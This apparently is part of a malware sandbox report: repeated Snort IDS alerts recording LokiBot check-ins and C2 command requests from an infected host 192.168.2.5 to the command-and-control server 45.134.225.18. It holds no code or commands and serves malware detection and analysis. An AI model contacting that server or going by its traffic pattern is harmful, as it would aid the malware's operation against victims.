                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49760 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49760 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49760 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49761 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49761 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49761 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49761 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49762 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49762 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49762 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49762 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49762 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49763 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49763 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49763 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49763 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49763 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49764 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49764 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49764 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49764 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49764 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49765 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49765 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49765 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49765 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49765 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49766 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49766 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49766 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49766 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49766 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49769 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49769 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49769 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49769 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49769 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49770 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49770 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49770 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49770 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49770 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49771 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49771 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49771 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49771 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49771 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49772 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49772 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49772 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49772 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49772 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49773 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49773 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49773 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49773 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49773 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49774 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49774 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49774 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49774 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49774 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49775 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49775 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49775 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49775 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49775 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49776 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49776 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49776 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49776 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49776 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49777 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49777 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49777 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49777 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49777 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49778 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49778 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49778 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49778 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49778 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49779 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49779 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49779 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49779 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49779 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49780 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49780 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49780 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49780 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49780 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49781 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49781 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49781 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49781 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49781 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49782 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49782 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49782 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49782 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49782 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49783 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49783 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49783 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49783 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49783 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49784 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49784 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49784 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49784 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49784 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49785 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49785 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49785 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49785 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49785 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49786 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49786 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49786 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49786 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49786 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49787 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49787 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49787 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49787 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49787 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49788 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49788 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49788 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49788 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49788 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49789 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49789 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49789 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49789 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49789 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49790 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49790 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49790 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49790 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49790 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49791 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49791 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49791 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49791 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49791 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49792 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49792 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49792 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49792 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49792 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49793 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49793 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49793 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49793 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49793 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49794 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49794 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49794 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49794 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49794 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49795 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49795 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49795 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49795 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49795 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49796 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49796 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49796 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49796 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49796 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49797 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49797 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49797 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49797 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49797 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49798 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49798 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49798 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49798 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49798 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49799 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49799 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49799 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49799 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49799 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49800 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49800 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49800 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49800 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49800 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49801 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49801 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49801 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49801 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49801 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49802 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49802 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49802 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49802 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49802 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49803 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49803 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49803 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49803 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49803 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49804 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49804 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49804 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49804 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49804 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49805 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49805 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49805 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49805 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49805 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49806 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49806 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49806 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49806 -> 45.134.225.18:80
